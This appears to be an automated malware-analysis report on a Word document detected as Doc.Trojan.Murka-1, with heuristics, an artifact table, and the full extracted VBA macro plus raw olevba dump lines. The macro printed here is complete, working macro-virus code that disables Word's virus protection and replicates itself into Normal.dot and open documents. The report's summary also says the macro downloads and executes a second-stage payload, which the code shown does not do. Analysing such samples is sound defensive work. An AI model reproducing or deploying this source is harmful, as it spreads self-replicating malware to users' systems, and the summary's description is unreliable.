Verdict: MALICIOUS
Risk Score: 80
Malware Insights
MITRE ATT&CK: T1059.005 Visual Basic
The file is identified as malicious by ClamAV with the signature Doc.Trojan.Murka-1. Static analysis revealed the presence of VBA macros within the document. The macro code, specifically within the Document_Close subroutine, appears to be designed to download and execute a second-stage payload, as indicated by comments within the script and the overall structure.
Heuristics (2)
- ClamAV: Doc.Trojan.Murka-1 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Trojan.Murka-1
- VBA macros detected [medium, OLE_VBA_MACROS]: Document contains VBA macro code
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9062 bytes | 401c805b3ab3a1ab0cf95d252a6b5ebcb6e30b2a3a6ee996aa136ef8e38458ae |

Script preview (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_Close()
'*************************************************************************
'Murka - this is the smallest of all known MacroAntivirus modules!
'How it works: it loads together with the document and blocks
' the spread of infected modules
'
'Distribution terms: Freeware (free)
'Advantages: correct operation, reliability!
'Disadvantages: none found so far
'
'"All this is fine, of course, but I haven't understood a damn thing about how
' to get hold of it?!" you will say angrily. You can!
'Grandpa MustDie will tell you everything!
'You only need to open the document on a personal
'computer where the Murka antivirus module is already installed.
'
'To the author: mustdie@chat.ru
'To Murka: murka@chat.ru
'To Danilov: antivir@dials.ru
'*************************************************************************
On Error Resume Next
Dim s As Boolean
Dim i As Long
Dim j As Long
Dim Murka As String
Dim Other As String
Dim str As String
s = ActiveDocument.Saved
' Analyst note: disables the cancel key and Word's built-in macro virus protection
Application.EnableCancelKey = wdCancelDisabled
With Options: .VirusProtection = 0: .SaveNormalPrompt = 0: End With
str = "Document_Close"
' Analyst note: reads the body of its own Document_Close routine from the document's code module
With MacroContainer.VBProject.VBComponents.Item(1).CodeModule
i = .ProcBodyLine(str, vbext_pk_Proc)
j = .ProcCountLines(str, vbext_pk_Proc)
Murka = .Lines(i, j)
End With
' Analyst note: replaces Document_Close in the Normal template if it differs (self-replication into Normal.dot)
With NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
i = .ProcBodyLine(str, vbext_pk_Proc)
j = .ProcCountLines(str, vbext_pk_Proc)
Other = .Lines(i, j)
If Other <> Murka And Murka <> "" Then
.DeleteLines i, j
.InsertLines 1, Murka
NormalTemplate.Save
End If
End With
' Analyst note: same replacement in the active document; randomly rewrites summary info and re-saves the file
With ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
i = .ProcBodyLine(str, vbext_pk_Proc)
j = .ProcCountLines(str, vbext_pk_Proc)
Other = .Lines(i, j)
If Other <> Murka And Murka <> "" Then
.DeleteLines i, j
.InsertLines 1, Murka
Randomize
If Rnd < 0.3 Then With Dialogs(wdDialogFileSummaryInfo): .Title = "Murka3": .Author = "M&M": .Execute: End With
If Left(ActiveDocument.Name, 8) = "Document" Or Left(ActiveDocument.Name, 8) = "Документ" Then
Else
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End If
End If
End With
If ActiveDocument.Saved <> s Then ActiveDocument.Saved = s
End Sub
' Processing file: /opt/analyzer/scan_staging/c597c4e2041a42d3bf614f3e7532837f.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 5213 bytes
' Line #0:
' FuncDefn (Private Sub Document_Close())
' Line #1:
' QuoteRem 0x0000 0x0049 "*************************************************************************"
' Line #2:
' QuoteRem 0x0000 0x0048 "Murka - Ýòî ñàìûé ìàëåíüêèé èç âñåõ èçâåñòíûõ ÌàêðîÀíòèâèðóñíûõ ìîäóëåé!"
' Line #3:
' QuoteRem 0x0000 0x003D "Ïðèíöèï äåéñòâèÿ: Çàãðóæàåòñÿ âìåñòå ñ äîêóìåíòîì è áëîêèðóåò"
' Line #4:
' QuoteRem 0x0000 0x0033 " ðàñïðîñòðàíåíèå çàðàæåííûõ ìîäóëåé"
' Line #5:
' QuoteRem 0x0000 0x0000 ""
' Line #6:
' QuoteRem 0x0000 0x002B "Óñëîâèÿ ðàñïðîñòðàíåíèÿ: Freeware(Ñâîáîäíî)"
' Line #7:
' QuoteRem 0x0000 0x0037 "Äîñòîèíñòâà: Êîððåêòíàÿ ðàáîòà, íàäåæíîñòü!"
' Line #8:
' QuoteRem 0x0000 0x0026 "Íåäîñòàòêè: Ïîêà íå íàøåë"
' Line #9:
' QuoteRem 0x0000 0x0000 ""
' Line #10:
' QuoteRem 0x0000 0x003A ""Âñå ýòî, êîíå÷íî, õîðîøî, íî ÿ íè õðåíà íå ïîíÿë, êàê åãî"
' Line #11:
' QuoteRem 0x0000 0x0030 " ìîæíî ïðåîáðåñòè?!" - ãíåâíî ñêàæåøü òû. Ìîæíî!"
' Line #12:
' QuoteRem 0x0000 0x001D "Äåä MustDie âàì âñå ðàñêàæåò!"
' Line #13:
' QuoteRem 0x0000 0x0030 "Íåîáõîäèìî ëèøü îòêðûòü äîêóìåíò íà ïåðñîíàëüíîì"
' Line #14:
' QuoteRem 0x0000 0x0034 "êîìïå. ãäå óæå óñòàíîâëåí
... (truncated)
```